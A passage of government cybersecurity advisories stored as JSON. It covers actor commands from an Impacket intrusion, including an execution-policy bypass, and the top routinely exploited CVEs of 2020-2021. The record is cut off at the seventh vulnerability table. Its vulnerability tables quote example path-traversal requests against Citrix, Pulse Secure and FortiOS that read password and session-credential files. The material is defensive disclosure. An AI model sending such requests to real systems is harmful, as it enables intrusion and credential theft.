| `powershell -ep bypass import-module .\vmware.ps1;export-mft -volume e` | Threat actors ran a PowerShell command with parameters to change the execution mode and bypass the Execution Policy to run the script from PowerShell and add a module to the current session: `powershell -ep bypass import-module .\vmware.ps1;export-mft -volume e`. This module appears to acquire and export the Master File Table (MFT) for volume E for further analysis by the cyber actor.[[14](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2>)] |
| set.exe | Used to display the current environment variable settings.[[15](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/set_1>)] An environment variable is a dynamic value pointing to system or user environments (folders) of the system. System environment variables are defined by the system and used globally by all users, while user environment variables are only used by the user who declared that variable, and they override the system environment variables (even if the variables are named the same). |
| dir.exe | Used to display a list of a directory's files and subdirectories matching the `eagx*` text string, likely to confirm the existence of such a file. |
| tasklist.exe and find.exe | Used to display a list of applications and services with their PIDs for all tasks running on the computer matching the string “powers”.[[16](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)][[17](<https://attack.mitre.org/software/S0057/>)][[18](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/find>)] |
| ping.exe | Used to send two ICMP echoes to amazon.com. |
This could have been to detect or avoid virtualization and analysis environments, circumvent network restrictions, or test their internet connection.[[19](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)] \n \ndel.exe with the /f parameter\n\n| \n\nUsed to force the deletion of read-only files with the *.rar and tempg* wildcards.[[20](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/del>)] \n \n### References\n\n[[1] Microsoft Net Share](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh750728\\(v=ws.11\\)>)\n\n[[2] Microsoft Get-ChildItem](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-childitem?view=powershell-7.2>)\n\n[[3] Microsoft systeminfo](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo>)\n\n[[4] Microsoft tasklist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)\n\n[[5] Microsoft ipconfig](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ipconfig>)\n\n[[6] Microsoft Route](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961510\\(v=ws.11\\)>)\n\n[[7] Microsoft netstat](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat>)\n\n[ [8] Microsoft certutil](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil>)\n\n[[9] Microsoft ping](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)\n\n[[10] Microsoft taskkill](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/taskkill>)\n\n[[11] Microsoft Compress-Archive](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.archive/compress-archive?view=powershell-7.2>)\n\n[[12] NTFSInfo 
v1.2](<https://docs.microsoft.com/en-us/sysinternals/downloads/ntfsinfo>)\n\n[[13] rarlab](<https://www.rarlab.com/>)\n\n[[14] Microsoft Import-Module](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2>)\n\n[[15] Microsoft set (environment variable)](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/set_1>)\n\n[[16] Microsoft tasklist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)\n\n[[17] Mitre ATT&CK - Sofware: TaskList](<https://attack.mitre.org/versions/v11/software/S0057/>)\n\n[[18] Microsoft find](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/find>)\n\n[[19] Microsoft ping](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)\n\n[[20] Microsoft del](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/del>)\n\n### Revisions\n\nOctober 4, 2022: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T12:00:00", "type": "ics", "title": "Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-10-05T12:00:00", "id": "AA22-277A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-277a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:07:27", "description": "### Summary\n\nThis Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). \n\nThis advisory provides details on the top 30 vulnerabilities\u2014primarily Common Vulnerabilities and Exposures (CVEs)\u2014routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021. \n\nCyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide. However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system. \n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Key Findings\n\nIn 2020, cyber actors readily exploited recently disclosed vulnerabilities to compromise unpatched systems. Based on available data to the U.S. Government, a majority of the top vulnerabilities targeted in 2020 were disclosed during the past two years. Cyber actor exploitation of more recently disclosed software flaws in 2020 probably stems, in part, from the expansion of remote work options amid the COVID-19 pandemic. 
The rapid shift and increased use of remote work options, such as virtual private networks (VPNs) and cloud-based environments, likely placed additional burden on cyber defenders struggling to maintain and keep pace with routine software patching.\n\n**Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies. **Many VPN gateway devices remained unpatched during 2020, with the growth of remote work options challenging the ability of organizations to conduct rigorous patch management.\n\nCISA, ACSC, the NCSC, and FBI consider the vulnerabilities listed in table 1 to be the topmost regularly exploited CVEs by cyber actors during 2020. \n\n_Table 1:Top Routinely Exploited CVEs in 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nType \n \n---|---|--- \n \nCitrix\n\n| \n\nCVE-2019-19781\n\n| \n\narbitrary code execution \n \nPulse\n\n| \n\nCVE 2019-11510\n\n| \n\narbitrary file reading \n \nFortinet\n\n| \n\nCVE 2018-13379\n\n| \n\npath traversal \n \nF5- Big IP\n\n| \n\nCVE 2020-5902\n\n| \n\nremote code execution (RCE) \n \nMobileIron\n\n| \n\nCVE 2020-15505\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2017-11882\n\n| \n\nRCE \n \nAtlassian\n\n| \n\nCVE-2019-11580\n\n| \n\nRCE \n \nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nRCE \n \nTelerik\n\n| \n\nCVE 2019-18935\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2019-0604\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2020-0787\n\n| \n\nelevation of privilege \n \nMicrosoft\n\n| \n\nCVE-2020-1472\n\n| \n\nelevation of privilege \n \nIn 2021, malicious cyber actors continued to target vulnerabilities in perimeter-type devices. Among those highly exploited in 2021 are vulnerabilities in Microsoft, Pulse, Accellion, VMware, and Fortinet.\n\nCISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. 
Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries' use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known.

Organizations are encouraged to remediate or mitigate vulnerabilities as quickly as possible to reduce the risk of exploitation. Most can be remediated by patching and updating systems. Organizations that have not remediated these vulnerabilities should investigate for the presence of IOCs and, if compromised, initiate incident response and recovery plans. See the Contact Information section below for how to reach CISA to report an incident or request technical assistance.

### 2020 CVEs

CISA, ACSC, the NCSC, and FBI have identified the following as the topmost exploited vulnerabilities by malicious cyber actors from 2020: CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2020-5902, CVE-2020-15505, CVE-2020-0688, CVE-2019-3396, CVE-2017-11882, CVE-2019-11580, CVE-2018-7600, CVE-2019-18935, CVE-2019-0604, CVE-2020-0787, and CVE-2020-1472.[[1](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)][[2](<https://media.defense.gov/2021/May/07/2002637232/-1/-1/0/ADVISORY%20FURTHER%20TTPS%20ASSOCIATED%20WITH%20SVR%20CYBER%20ACTORS.PDF>)][[3](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)] Among these vulnerabilities, CVE-2019-19781 was the most exploited flaw in 2020, according to U.S. Government technical analysis. CVE-2019-19781 is a recently disclosed critical vulnerability in Citrix's Application Delivery Controller (ADC)—a load balancing application for web, application, and database servers widely used throughout the United States.[[4](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)][[5](<https://www.ncsc.gov.uk/news/citrix-alert>)] Nation-state and criminal cyber actors most likely favor using this vulnerability because it is easy to exploit, Citrix servers are widespread, and exploitation enables the actors to perform unauthorized RCE on a target system.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)]

Identified as emerging targets in early 2020,[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)] unremediated instances of CVE-2019-19781 and CVE-2019-11510 continued to be exploited throughout the year by nation-state advanced persistent threat actors (APTs), who leveraged these and other vulnerabilities, such as CVE-2018-13379,[[8](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)][[9](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)] in VPN services[[10](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>)][[11](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)] to compromise an array of organizations, including those involved in COVID-19 vaccine development.[[12](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)][[13](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)]

The CVE-2019-11510 vulnerability in Pulse Connect Secure VPN was also frequently targeted by nation-state APTs. Actors can exploit the vulnerability to steal the unencrypted credentials for all users on a compromised Pulse VPN server, and they can retain unauthorized access after the system is patched unless all compromised credentials are changed. Nation-state APTs also commonly exploited CVE-2020-15505 and CVE-2020-5902.[[14](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[15](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[16](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)][[17](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)]

### 2021 CVEs

In 2021, cyber actors continued to target vulnerabilities in perimeter-type devices. In addition to the 2020 CVEs listed above, organizations should prioritize patching for the following CVEs known to be exploited.

 * **Microsoft Exchange:** CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065
   * See CISA's Alert: Mitigate Microsoft Exchange Server Vulnerabilities for more information on identifying and mitigating malicious activity concerning these vulnerabilities.
 * **Pulse Secure:** CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900
   * See CISA's Alert: Exploitation of Pulse Connect Secure Vulnerabilities for more information on how to investigate and mitigate this malicious activity.
 * **Accellion:** CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, and CVE-2021-27104
   * See the Australia-New Zealand-Singapore-UK-U.S. Joint Cybersecurity Advisory: Exploitation of Accellion File Transfer Appliance for technical details and mitigations.
 * **VMware:** CVE-2021-21985
   * See CISA's Current Activity: Unpatched VMware vCenter Software for more information and guidance.
 * **Fortinet:** CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591
   * See the CISA-FBI Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks for more details and mitigations.

### Mitigations and Indicators of Compromise

One of the most effective best practices to mitigate many vulnerabilities is to update software versions once patches are available and as soon as is practicable. If this is not possible, consider applying temporary workarounds or other mitigations, if provided by the vendor. If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems). This advisory highlights vulnerabilities that should be considered as part of the prioritization process. To further assist remediation, automatic software updates should be enabled whenever possible.

Focusing scarce cyber defense resources on patching those vulnerabilities that cyber actors most often use offers the potential of bolstering network security while impeding our adversaries' operations. For example, nation-state APTs in 2020 extensively relied on a single RCE vulnerability discovered in Atlassian Crowd, a centralized identity management application (CVE-2019-11580), in their reported operations. A concerted focus on patching this vulnerability could have a relatively broad impact by forcing the actors to find alternatives, which may not have the same broad applicability to their target set.

Additionally, attackers commonly exploit weak authentication processes, particularly in external-facing devices.
Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.

Tables 2–14 provide more details about, and specific mitigations for, each of the top exploited CVEs in 2020.

**Note:** The lists of associated malware corresponding to each CVE below are not meant to be exhaustive but are intended to identify a malware family commonly associated with exploiting the CVE.

_Table 2: CVE-2019-19781 Vulnerability Details_

**Citrix Netscaler Directory Traversal (CVE-2019-19781)**

_**Vulnerability Description**_
Citrix Netscaler Application Delivery Controller (ADC) is vulnerable to RCE and full system compromise due to poor access controls, thus allowing directory traversal.

_**CVSS 3.0**_: Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_
The lack of adequate access controls allows an attacker to enumerate system directories for vulnerable code (directory traversal). In this instance, Citrix ADC maintains a vulnerable Perl script (`newbm.pl`) that, when accessed via an `HTTP POST` request (`POST https://$TARGET/vpn/../vpn/portal/scripts/newbm.pl`), allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g., `curl`, `wget`, `Invoke-WebRequest`) and gain unauthorized access to the OS.

_Multiple malware campaigns, including NOTROBIN, have taken advantage of this vulnerability._

**_Fix_**
[Patch Available](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)

**_Recommended Mitigations_**

 * Implement the appropriate refresh build according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781.
 * If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).

_**Detection Methods**_

 * CISA has developed a free detection tool for this vulnerability: [cisagov/check-cve-2019-19781](<https://github.com/cisagov/check-cve-2019-19781>): Test a host for susceptibility to CVE-2019-19781.
 * Nmap developed a script that can be used with the port scanning engine: [CVE-2019-19781 - Citrix ADC Path Traversal #1893](<https://github.com/nmap/nmap/pull/1893/files>).
 * Citrix also developed a free tool for detecting compromises of Citrix ADC appliances related to CVE-2019-19781: [Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781>).
 * CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>.

**_Vulnerable Technologies and Versions_**
Citrix ADC and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0

_**References and Additional Guidance**_

 * [Citrix Blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)
 * [National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD): Vulnerability Detail CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)
 * [Tripwire Vulnerability and Exposure Research Team (VERT) Article: Citrix NetScaler CVE-2019-19781: What You Need to Know](<https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>)
 * [National Security Agency Cybersecurity Advisory: Critical Vulnerability In Citrix Application Delivery Controller (ADC) And Citrix Gateway](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)
 * [CISA Alert: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)
 * [NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)
 * [CISA-NCSC Joint Cybersecurity Advisory: COVID-19 Exploited by Malicious Cyber Actors](<https://us-cert.cisa.gov/ncas/alerts/aa20-099a>)
 * [CISA Alert: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)
 * [FBI-CISA Joint Cybersecurity Advisory: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders](<https://www.ic3.gov/Media/News/2021/210426.pdf>)
 * [DoJ: Seven International Cyber Defendants, Including "Apt41" Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)
 * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)
 * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>)
 * [GitHub: nsacyber / Mitigating Web Shells](<https://github.com/nsacyber/Mitigating-Web-Shells>)

_Table 3: CVE-2019-11510 Vulnerability Details_

**Pulse Secure Connect VPN (CVE-2019-11510)**

_**Vulnerability Description**_
Pulse Secure Connect is vulnerable to unauthenticated arbitrary file disclosure. An attacker can exploit this vulnerability to gain access to administrative credentials.

**CVSS 3.0**: Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_
Improper access controls allow a directory traversal that an attacker can exploit to read the contents of system files. For example, the attacker could use a string such as `https://sslvpn.insecure-org.com/dana-na/../dana/html5/acc/guacmole/../../../../../../etc/passwd?/dana/html5/guacamole/` to obtain the local password file from the system. The attacker can also obtain admin session data and replay session tokens in the browser. Once compromised, an attacker can run arbitrary scripts on any host that connects to the VPN. This makes anyone connecting to the VPN a potential target for compromise.

_Multiple malware campaigns have taken advantage of this vulnerability, most notably REvil/Sodinokibi ransomware._

_**Fix**_
[Patch Available](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)

_**Recommended Mitigations**_

 * Upgrade to the latest Pulse Secure VPN.
 * Stay alert to any scheduled tasks or unknown files/executables.
 * Create detection/protection mechanisms that respond to directory traversal (`/../../../`) attempts to read local system files.

**_Detection Methods_**

 * CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN appliance for CVE-2019-11510: cisagov/check-your-pulse.
 * Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708.

_**Vulnerable Technologies and Versions**_
Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 are vulnerable.

_**References**_

 * [NIST NVD Vulnerability Detail: CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)
 * [CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)
 * [Pulse Security Advisory: SA44101 – 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)
 * [GitHub: cisagov / Check Your Pulse](<https://github.com/cisagov/check-your-pulse>)
 * [CISA Analysis Report: Federal Agency Compromised by Malicious Cyber Actor](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>)
 * [CISA Alert: Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>)
 * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)
 * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)
 * [DoJ Press Release: Seven International Cyber Defendants, Including "Apt41" Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)
 * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)
 * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>)
 * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>)

_Table 4: CVE-2018-13379 Vulnerability Details_

**Fortinet FortiOS Secure Socket Layer VPN (CVE-2018-13379)**

**_Vulnerability Description_**
Fortinet Secure Sockets Layer (SSL) VPN is vulnerable to unauthenticated directory traversal, which allows attackers to gain access to the `sslvpn_websession` file. An attacker is then able to extract clear-text usernames and passwords.

**_CVSS 3.0_**: Critical

**_Vulnerability Discussion, IOCs, and Malware Campaigns_**
Weaknesses in user access controls and the web application directory structure allow attackers to read system files without authentication. Attackers are able to perform an HTTP GET request such as `http://$SSLVPNTARGET?lang=/../../../..//////////dev/cmdb/sslvpn_websession`. This results in the server responding with unprintable/hex characters alongside cleartext credential information.
_Multiple malware campaigns have taken advantage of this vulnerability, the most notable being Cring ransomware (also known as Crypt3, Ghost, Phantom, and Vjszy1lo)._

**_Fix_**
[Patch Available](<https://www.fortiguard.com/psirt/FG-IR-18-384>)

**_Recommended Mitigations_**

 * Upgrade to the latest Fortinet SSL VPN.
 * Monitor for alerts to any unscheduled tasks or unknown files/executables.
 * Create detection/protection mechanisms that respond to directory traversal (`/../../../`) attempts to read the `sslvpn_websession` file.

**_Detection Methods_**

 * Nmap developed a script that can be used with the port scanning engine: Fortinet SSL VPN CVE-2018-13379 vuln scanner #1709.

**_Vulnerable Technologies and Versions_**
Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7, and 5.4.6 to 5.4.12 are vulnerable.

_**References**_

 * [FortiOS System File Leak Through SSL VPN via Specially Crafted HTTP Resource Requests](<https://www.fortiguard.com/psirt/FG-IR-18-384>)
 * [GitHub: Fortinet SSL VPN CVE-2018-13379 Vuln Scanner #1709](<https://github.com/nmap/nmap/pull/1709>)
 * [Fortinet Blog: Update Regarding CVE-2018-13379](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)
 * [NIST NVD Vulnerability Detail: CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)
 * [FBI-CISA Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)
 * [FBI-CISA Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/Media/News/2021/210402.pdf>)
 * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)
 * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)
 * [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity](<https://www.ic3.gov/Media/News/2021/210527.pdf>)

_Table 5: CVE-2020-5902 Vulnerability Details_

**F5 BIG-IP Traffic Management User Interface (CVE-2020-5902)**

_**Vulnerability Description**_
The Traffic Management User Interface (TMUI), also referred to as the Configuration Utility, has an RCE vulnerability in undisclosed pages.

_**CVSS 3.0**_: Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_
This vulnerability allows unauthenticated attackers, or authenticated users, with network access to the Configuration Utility (through the BIG-IP management port and/or self IPs) to execute arbitrary system commands, create or delete files, disable services, and execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.

_**Fix**_
[Upgrade to Secure Versions Available](<https://support.f5.com/csp/article/K52145254>)

_**Recommended Mitigations**_
Download and install a fixed software version from a vendor-approved resource. If it is not possible to update quickly, restrict access via the following actions.

 * Address unauthenticated and authenticated attackers on self IPs by blocking all access.
 * Address unauthenticated attackers on the management interface by restricting access.

**_Detection Methods_**

 * F5 developed a free detection tool for this vulnerability: [f5devcentral / cve-2020-5902-ioc-bigip-checker](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).
 * Manually check your software version to see if it is susceptible to this vulnerability.

_**Vulnerable Technologies and Versions**_
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) 15.1.0, 15.0.0-15.0.1, 14.1.0-14.1.2, 13.1.0-13.1.3, 12.1.0-12.1.5, and 11.6.1-11.6.5 are vulnerable.

**_References_**

 * [F5 Article: TMUI RCE Vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)
 * [NIST NVD Vulnerability Detail: CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)
 * [CISA Alert: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)
 * [MITRE CVE Record: CVE-2020-5902](<https://vulners.com/cve/CVE-2020-5902>)

_Table 6: CVE-2020-15505 Vulnerability Details_

**MobileIron Core & Connector (CVE-2020-15505)**

_**Vulnerability Description**_
MobileIron Core & Connector, Sentry, and Monitoring and Reporting Database (RDB) software are vulnerable to RCE via unspecified vectors.

_**CVSS 3.0**_: Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_
CVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.

Multiple APTs have been observed exploiting this vulnerability to gain unauthorized access.

**_Fix_**
[Patch Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>)

_**Recommended Mitigations**_

 * Download and install a fixed software version from a vendor-approved resource.

_**Detection Methods**_

 * None. Manually check your software version to see if it is susceptible to this vulnerability.

_**Vulnerable Technologies and Versions**_
MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, and 10.6.0.0; Sentry versions 9.7.2 and earlier and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier are vulnerable.

_**References**_

 * [Ivanti Blog: MobileIron Security Updates Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>)
 * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)
 * [NIST NVD Vulnerability Detail: CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)
 * [MITRE CVE Record: CVE-2020-15505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15505>)
 * [NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)

_Table 7: CVE-2020-0688 Vulnerability Details_

